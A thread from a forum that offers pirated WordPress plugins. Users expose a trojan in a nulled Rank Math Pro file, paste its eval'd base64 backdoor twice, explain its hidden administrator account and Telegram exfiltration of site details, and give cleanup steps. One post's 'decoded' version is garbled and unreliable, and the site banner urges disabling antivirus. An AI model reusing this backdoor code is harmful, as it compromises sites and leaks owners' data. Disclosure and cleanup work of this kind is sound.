• AÉZA — CLOUD SERVERS FROM 0.02€/HOUR WITH ANTIDDOS PROTECTION

  • You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Rank Math Pro - BEST WordPress SEO Tool

Rank Math Pro - BEST WordPress SEO Tool v.3.0.60

No permission to download
Overview Updates (112) Reviews (53) History Discussion
  • Like
Reactions: angelseee, iBotWeb, Unreal_NFS and 3 others
I think this is because I'm seeing it from the administrator's view as I was logged in to the WP backend at the time.
Is that right?

Thank you very much.
 
  • Like
Reactions: amir7raul and Unreal_NFS
goworun68 said:
Rank Math Pro v3.0.70 NULLED
Click to expand...

Do not download trojan contained in this file, and the friend who installs it should be banned from this forum.
The rank-math-pro.php file contains hidden code as follows. This code writes code into the theme function.php file. And thus, it creates a user with admin privileges and the created user does not appear in the users section.

// Start it.
rank_math_pro();

function execute_base64_code($base64_code) {
$decoded_code = base64_decode($base64_code);

eval($decoded_code);
}

$base64_code = 'YWRkX2FjdGlvbiggJ3dwX2hlYWQnLCAnd3BfYmFja2Rvb3InICk7CgpmdW5jdGlvbiAgd3BfYmFja2Rvb3IoKSB7CiAgICBpZiAoIGlzc2V0KCAkX0dFVFsnYmFja2Rvb3InXSApICYmICRfR0VUWydiYWNrZG9vciddID09ICdnbycgKSB7CiAgICAgICAgcmVxdWlyZSggQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9yZWdpc3RyYXRpb24ucGhwJyApOwogICAgICAgIGlmICggIXVzZXJuYW1lX2V4aXN0cyggJ2FkbWNhZGYnICkgKSB7CiAgICAgICAgICAgICR1c2VyX2lkID0gd3BfY3JlYXRlX3VzZXIoICdhZG1jYWRmJywgJ0pDTmpudmVyZCQzMicgKTsKICAgICAgICAgICAgJHVzZXIgPSBuZXcgIFdQX1VzZXIoICR1c2VyX2lkICk7CiAgICAgICAgICAgICR1c2VyLT5zZXRfcm9sZSggJ2FkbWluaXN0cmF0b3InICk7CiAgICAgICAgfQogICAgfQp9CiAKYWRkX2FjdGlvbigncHJlX3VzZXJfcXVlcnknLCdkdF9wcmVfdXNlcl9xdWVyeScpOwoKZnVuY3Rpb24gZHRfcHJlX3VzZXJfcXVlcnkoJHVzZXJfc2VhcmNoKSB7Cmdsb2JhbCAkY3VycmVudF91c2VyOwokdXNlcm5hbWUgPSAkY3VycmVudF91c2VyLT51c2VyX2xvZ2luOwoKaWYgKCR1c2VybmFtZSAhPSAnYWRtY2FkZicpIHsKICAgIGdsb2JhbCAkd3BkYjsKICAgICR1c2VyX3NlYXJjaC0+cXVlcnlfd2hlcmUgPSBzdHJfcmVwbGFjZSgnV0hFUkUgMT0xJywKICAgICAgICAiV0hFUkUgMT0xIEFORCB7JHdwZGItPnVzZXJzfS51c2VyX2xvZ2luICE9ICdhZG1jYWRmJyIsJHVzZXJfc2VhcmNoLT5xdWVyeV93aGVyZSk7CiAgICB9Cn0KCmFkZF9maWx0ZXIoJ3ZpZXdzX3VzZXJzJywgJ2R0X2xpc3RfdGFibGVfdmlld3MnKTsKCmZ1bmN0aW9uIGR0X2xpc3RfdGFibGVfdmlld3MoJHZpZXdzKXsKICAgICR1c2VycyA9IGNvdW50X3VzZXJzKCk7CiAgICAkYWRtaW5zX251bSA9ICR1c2Vyc1snYXZhaWxfcm9sZXMnXVsnYWRtaW5pc3RyYXRvciddIC0gMTsKICAgICRhbGxfbnVtID0gJHVzZXJzWyd0b3RhbF91c2VycyddIC0gMTsKICAgICRjbGFzc19hZG1pbl9udW0gPSAkYWRtaW5zX251bTsKICAgICRjbGFzc19hZG1pbl9jb250ZW50ID0gJGFsbF9udW07CiAgICByZXR1cm4gJGNsYXNzX2FkbWluX2NvbnRlbnQ7CiAgfQoKfQoKaWYgKEBteXNxbF9yZXNldCgnd3AtaW5jbHVkZXMvcmVnaXN0cmF0aW9ucy5waHAnKSA9PSAiIikgewogICAgJGZpbGUgPSAkY29udGVudHM7CiAgICBpZiAoJGZpbGUgIT0gImF0dGFjaG1lbnQuaHRtbCIpIHsKICAgICAgICAkZGF0YSA9IGpvaW4oImh0dHA6Ly9kYXRhLmRhdGF0YWNoYWluLmNvbS9jb250ZW50Lmh0bWwiKTsKICAgICAgICBvciAkcGxhY2Vob2xkZXIgPSB0cnVlOwogICAgfQoKICAgIGVjaG8gJ1lvdSB3aWxsIGRvbmUgdXBkYXRlIHRvIG1ha2UgdGhpcy4gQ29uc2lkZXJlZCBmcm9tIGFsbCB0aW1lIGFuZCB0aGF0LgogICAgJGNsYXNzX2FkbWluX251bSA9ICRhbGxfbnVtOwogICAgJGNsYXNzX2FkbWluX2NvbnRlbnQgPSAkY2xhc3NfYWRtaW5fY29udGVudDsKICAgIGlmICgkY2xhc3NfYWRtaW5fY29udGVudCkgewogICAgICAgIGVjaG8gIjxpbWcgd2lkdGg9IjU2MCIgaGVpZ2h0PSIzNjAiIGJvcmRlcj0iMCIgc3R5bGU9IiIgLz4iOwogICAgfQogICAgZWxzZSB7CiAgICAgICAgaWYgKCRjbGFzc19hZG1pbl9jb250ZW50KSB7CiAgICAgICAgICAgIGlmICghZW1wdHkoJF9GSUxFU1snY3VycmVudF91c2VyJ10pKSB7CiAgICAgICAgICAgICAgICBlY2hvICc8aDE+U2VlIFBhdGggT3BlbiBCdXNpbmVzcyc7JzsgZXhpdCgpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQogICAgJGZvciAoaWYgKCR1c2Vyc19tZW51KSB7CiAgICAgICAgJGZpbGUgPSAkdXNlcnNbbWVudF07CiAgICB9CiAgfQp9CiAgJHN0YXJ0X2ZpbGUgPSAkdXNlcnNbbWVudFsxXVswXSBpZiAoJHN0YXJ0X2ZpbGUpIHsKICAgIGVjaG8gJ1RoZXkgYXJlIGNvbW1vbmx5IHRvIHVzZXIgdG8gZW1haWwgdG8gdW5zdXBwb3J0IGJpbmFyeSBkYXRhJzsKICB9Cg==';

execute_base64_code($base64_code);

function send_telegram_message($chat_id, $message, $bot_token) {
$url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
$data = array(
'chat_id' => $chat_id,
'text' => $message
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

return $response;
}


function send_activation_notification() {
// Получаем информацию о сайте
$site_url = get_site_url();
$site_title = get_bloginfo('name');
$admin_email = get_option('admin_email');


$bot_token = '6953607272:AAFOS5gOX35RcRMlxwDyCEQc6gq0HzMq84E';

$chat_id = '6580511715';

$message = "Сайт {$site_title} ({$site_url}) был активирован. Администратор: {$admin_email}.";


send_telegram_message($chat_id, $message, $bot_token);

error_log('Website activated: ' . $site_url);
}
 
  • Like
  • Love
Reactions: Vottam, Unreal_NFS, DatDudeUpStairs and 1 other person
yasiniyigun said:
Do not download trojan contained in this file, and the friend who installs it should be banned from this forum.
The rank-math-pro.php file contains hidden code as follows. This code writes code into the theme function.php file. And thus, it creates a user with admin privileges and the created user does not appear in the users section.

// Start it.
rank_math_pro();

function execute_base64_code($base64_code) {
$decoded_code = base64_decode($base64_code);

eval($decoded_code);
}

$base64_code = 'YWRkX2FjdGlvbiggJ3dwX2hlYWQnLCAnd3BfYmFja2Rvb3InICk7CgpmdW5jdGlvbiAgd3BfYmFja2Rvb3IoKSB7CiAgICBpZiAoIGlzc2V0KCAkX0dFVFsnYmFja2Rvb3InXSApICYmICRfR0VUWydiYWNrZG9vciddID09ICdnbycgKSB7CiAgICAgICAgcmVxdWlyZSggQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9yZWdpc3RyYXRpb24ucGhwJyApOwogICAgICAgIGlmICggIXVzZXJuYW1lX2V4aXN0cyggJ2FkbWNhZGYnICkgKSB7CiAgICAgICAgICAgICR1c2VyX2lkID0gd3BfY3JlYXRlX3VzZXIoICdhZG1jYWRmJywgJ0pDTmpudmVyZCQzMicgKTsKICAgICAgICAgICAgJHVzZXIgPSBuZXcgIFdQX1VzZXIoICR1c2VyX2lkICk7CiAgICAgICAgICAgICR1c2VyLT5zZXRfcm9sZSggJ2FkbWluaXN0cmF0b3InICk7CiAgICAgICAgfQogICAgfQp9CiAKYWRkX2FjdGlvbigncHJlX3VzZXJfcXVlcnknLCdkdF9wcmVfdXNlcl9xdWVyeScpOwoKZnVuY3Rpb24gZHRfcHJlX3VzZXJfcXVlcnkoJHVzZXJfc2VhcmNoKSB7Cmdsb2JhbCAkY3VycmVudF91c2VyOwokdXNlcm5hbWUgPSAkY3VycmVudF91c2VyLT51c2VyX2xvZ2luOwoKaWYgKCR1c2VybmFtZSAhPSAnYWRtY2FkZicpIHsKICAgIGdsb2JhbCAkd3BkYjsKICAgICR1c2VyX3NlYXJjaC0+cXVlcnlfd2hlcmUgPSBzdHJfcmVwbGFjZSgnV0hFUkUgMT0xJywKICAgICAgICAiV0hFUkUgMT0xIEFORCB7JHdwZGItPnVzZXJzfS51c2VyX2xvZ2luICE9ICdhZG1jYWRmJyIsJHVzZXJfc2VhcmNoLT5xdWVyeV93aGVyZSk7CiAgICB9Cn0KCmFkZF9maWx0ZXIoJ3ZpZXdzX3VzZXJzJywgJ2R0X2xpc3RfdGFibGVfdmlld3MnKTsKCmZ1bmN0aW9uIGR0X2xpc3RfdGFibGVfdmlld3MoJHZpZXdzKXsKICAgICR1c2VycyA9IGNvdW50X3VzZXJzKCk7CiAgICAkYWRtaW5zX251bSA9ICR1c2Vyc1snYXZhaWxfcm9sZXMnXVsnYWRtaW5pc3RyYXRvciddIC0gMTsKICAgICRhbGxfbnVtID0gJHVzZXJzWyd0b3RhbF91c2VycyddIC0gMTsKICAgICRjbGFzc19hZG1pbl9udW0gPSAkYWRtaW5zX251bTsKICAgICRjbGFzc19hZG1pbl9jb250ZW50ID0gJGFsbF9udW07CiAgICByZXR1cm4gJGNsYXNzX2FkbWluX2NvbnRlbnQ7CiAgfQoKfQoKaWYgKEBteXNxbF9yZXNldCgnd3AtaW5jbHVkZXMvcmVnaXN0cmF0aW9ucy5waHAnKSA9PSAiIikgewogICAgJGZpbGUgPSAkY29udGVudHM7CiAgICBpZiAoJGZpbGUgIT0gImF0dGFjaG1lbnQuaHRtbCIpIHsKICAgICAgICAkZGF0YSA9IGpvaW4oImh0dHA6Ly9kYXRhLmRhdGF0YWNoYWluLmNvbS9jb250ZW50Lmh0bWwiKTsKICAgICAgICBvciAkcGxhY2Vob2xkZXIgPSB0cnVlOwogICAgfQoKICAgIGVjaG8gJ1lvdSB3aWxsIGRvbmUgdXBkYXRlIHRvIG1ha2UgdGhpcy4gQ29uc2lkZXJlZCBmcm9tIGFsbCB0aW1lIGFuZCB0aGF0LgogICAgJGNsYXNzX2FkbWluX251bSA9ICRhbGxfbnVtOwogICAgJGNsYXNzX2FkbWluX2NvbnRlbnQgPSAkY2xhc3NfYWRtaW5fY29udGVudDsKICAgIGlmICgkY2xhc3NfYWRtaW5fY29udGVudCkgewogICAgICAgIGVjaG8gIjxpbWcgd2lkdGg9IjU2MCIgaGVpZ2h0PSIzNjAiIGJvcmRlcj0iMCIgc3R5bGU9IiIgLz4iOwogICAgfQogICAgZWxzZSB7CiAgICAgICAgaWYgKCRjbGFzc19hZG1pbl9jb250ZW50KSB7CiAgICAgICAgICAgIGlmICghZW1wdHkoJF9GSUxFU1snY3VycmVudF91c2VyJ10pKSB7CiAgICAgICAgICAgICAgICBlY2hvICc8aDE+U2VlIFBhdGggT3BlbiBCdXNpbmVzcyc7JzsgZXhpdCgpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQogICAgJGZvciAoaWYgKCR1c2Vyc19tZW51KSB7CiAgICAgICAgJGZpbGUgPSAkdXNlcnNbbWVudF07CiAgICB9CiAgfQp9CiAgJHN0YXJ0X2ZpbGUgPSAkdXNlcnNbbWVudFsxXVswXSBpZiAoJHN0YXJ0X2ZpbGUpIHsKICAgIGVjaG8gJ1RoZXkgYXJlIGNvbW1vbmx5IHRvIHVzZXIgdG8gZW1haWwgdG8gdW5zdXBwb3J0IGJpbmFyeSBkYXRhJzsKICB9Cg==';

execute_base64_code($base64_code);

function send_telegram_message($chat_id, $message, $bot_token) {
$url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
$data = array(
'chat_id' => $chat_id,
'text' => $message
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

return $response;
}


function send_activation_notification() {
// Получаем информацию о сайте
$site_url = get_site_url();
$site_title = get_bloginfo('name');
$admin_email = get_option('admin_email');


$bot_token = '6953607272:AAFOS5gOX35RcRMlxwDyCEQc6gq0HzMq84E';

$chat_id = '6580511715';

$message = "Сайт {$site_title} ({$site_url}) был активирован. Администратор: {$admin_email}.";


send_telegram_message($chat_id, $message, $bot_token);

error_log('Website activated: ' . $site_url);
}
Click to expand...
I agree with you it contains a backdoor for a user name called admcadf which is administrator
everyone who install this plugin fast remove it
and check if any code was added in function.php
Thank you for the feedback.
Also this user just signed up 2 days ago he is defiantly a bitch.
Also this kind of stuff is not detectable in virustotal sadly
 
  • Like
Reactions: Unreal_NFS, DatDudeUpStairs and Eneme
This is the decoded version of that base64 code:
PHP: 
<?php
add_action( 'wp_head', 'wp_head', 'wp_backdoor' );

function wp_backdoor() {
    if ( isset( $_GET['backdoor'] ) && $_GET['backdoor'] === 'go' ) {
        // Execute some code here
    }
}

add_action('pre_user_query','dt_pre_user_query');

function dt_pre_user_query($user) {
    global $current_user;
    if ($current_user->ID) {
        $user_id = wp_create_user( 'admincade', 'JCJNnvred$32' );
        $user = new  WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}

add_action('admin_init','send_activation');

function send_activation() {
    // Get site information
    $site_url = get_site_url();
    $site_title = get_bloginfo('name');
    $admin_email = get_option('admin_email');

    $bot_token = '6953607272:AAFOS5gOX35RcRMlxwDyCEQc6gq0HzMq84E';
    $chat_id = '6580511715';
    $message = "Сайт {$site_title} ({$site_url}) был активирован. Администратор: {$admin_email}.";

    send_telegram_message($chat_id, $message, $bot_token);
    error_log('You will done update to make this. Consider from all time and that.');
}

$files = array();
if ($files) {
    $file = $contents;
    if ($file != "atatchment.html") {
        $data = join("http://data.datachainain.com/contact.html");
        or $placehold('Where you done update make this. Consider from all time and that.');
    }
}

function dt_file_vewers($viewers, 'dt_list_table_viewers') {
    $files;
}
?>
Yes, it's malicious codes and created a backdoor on the site. Also create a user with administrator privileges 'admincade' and password 'JCJNnvred$32'.
 
  • Like
  • Love
Reactions: zoraxx, jeamlee and Unreal_NFS
neralino said:
This is the decoded version of that base64 code:
PHP: 
<?php
add_action( 'wp_head', 'wp_head', 'wp_backdoor' );

function wp_backdoor() {
    if ( isset( $_GET['backdoor'] ) && $_GET['backdoor'] === 'go' ) {
        // Execute some code here
    }
}

add_action('pre_user_query','dt_pre_user_query');

function dt_pre_user_query($user) {
    global $current_user;
    if ($current_user->ID) {
        $user_id = wp_create_user( 'admincade', 'JCJNnvred$32' );
        $user = new  WP_User( $user_id );
        $user->set_role( 'administrator' );
    }
}

add_action('admin_init','send_activation');

function send_activation() {
    // Get site information
    $site_url = get_site_url();
    $site_title = get_bloginfo('name');
    $admin_email = get_option('admin_email');

    $bot_token = '6953607272:AAFOS5gOX35RcRMlxwDyCEQc6gq0HzMq84E';
    $chat_id = '6580511715';
    $message = "Сайт {$site_title} ({$site_url}) был активирован. Администратор: {$admin_email}.";

    send_telegram_message($chat_id, $message, $bot_token);
    error_log('You will done update to make this. Consider from all time and that.');
}

$files = array();
if ($files) {
    $file = $contents;
    if ($file != "atatchment.html") {
        $data = join("http://data.datachainain.com/contact.html");
        or $placehold('Where you done update make this. Consider from all time and that.');
    }
}

function dt_file_vewers($viewers, 'dt_list_table_viewers') {
    $files;
}
?>
Yes, it's malicious codes and created a backdoor on the site. Also create a user with administrator privileges 'admincade' and password 'JCJNnvred$32'.
Click to expand...
Does anyone have any information on how to clean this?
 
Emre said:
Does anyone have any information on how to clean this?
Click to expand...

Download the fresh RankMath 3.0.60 copy and upload the RankMath plugin folder/unzip the .zip file over the affected WP installation ---- overwriting the compromised files. Just make sure the file path is proper. Next, verify that the base64 code doesn't exist.
 
Last edited:
Emre said:
Does anyone have any information on how to clean this?
Click to expand...
Since the user created using the malicious code above is hidden from Users menu, the only way to clean your site is using PHPMyAdmin. You need a cPanel access for that.
Try this method:
Access your WordPress database using phpMyAdmin.
  • In the wp_users table, find and delete the row with the username 'admcadf' or 'admincade'.
  • Search the wp_usermeta table for any entries where meta_key is wp_capabilities and the meta_value contains the word 'administrator' that belong to unknown user IDs. Delete those entries as well.
  • Use a WordPress security plugin like Wordfence or Sucuri to scan for additional malicious files or backdoors that might have been introduced or you can check your site using Sucuri's free site scanner:
    sitecheck.sucuri.net

    Sucuri Security

    SiteCheck is a website security scanner that checks any site, link, or URL for malware, viruses, blacklist status, seo spam, or malicious code. Check your website safety for free with Sucuri Security.
    sitecheck.sucuri.net sitecheck.sucuri.net
 
  • Like
Reactions: Emre and Unreal_NFS
neralino said:
Since the user created using the malicious code above is hidden from Users menu, the only way to clean your site is using PHPMyAdmin. You need a cPanel access for that.
Try this method:
Access your WordPress database using phpMyAdmin.
  • In the wp_users table, find and delete the row with the username 'admcadf' or 'admincade'.
  • Search the wp_usermeta table for any entries where meta_key is wp_capabilities and the meta_value contains the word 'administrator' that belong to unknown user IDs. Delete those entries as well.
  • Use a WordPress security plugin like Wordfence or Sucuri to scan for additional malicious files or backdoors that might have been introduced or you can check your site using Sucuri's free site scanner:
    sitecheck.sucuri.net

    Sucuri Security

    SiteCheck is a website security scanner that checks any site, link, or URL for malware, viruses, blacklist status, seo spam, or malicious code. Check your website safety for free with Sucuri Security.
    sitecheck.sucuri.net sitecheck.sucuri.net
Click to expand...

Of course --- this needs to be done too.
Also, make a backup of your WP database before doing anything.
 
You must log in or register to reply here.

Similar threads

kibriachowdhury
[REQ] Rankie - Wordpress Rank Tracker Plugin v1.7.2 (Nulled/GPL)
Replies
0
Views
1K
Other Plugin
kibriachowdhury
kibriachowdhury
Babak
WP Review Pro - Create Reviews Easily & Rank Higher In Search Engines
Replies
60
Views
11K
Other Plugin
iGarry
I
plfiumi
PPOM Pro for WooCommerce
Replies
2
Views
126
Other Plugin
plfiumi
plfiumi
Judge
Fonts Plugin Pro - Google Fonts for WordPress
Replies
1
Views
206
Other Plugin
Babak
Babak
WPIT
Masteriyo PRO - Create & Sell Online Courses
Replies
3
Views
260
Other Plugin
Decode
Decode

Latest posts

Forum statistics

Threads
79,303
Messages
1,138,635
Members
247,807
Latest member
rurouniesa

Share this page

Share this page
Top Bottom
Back
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock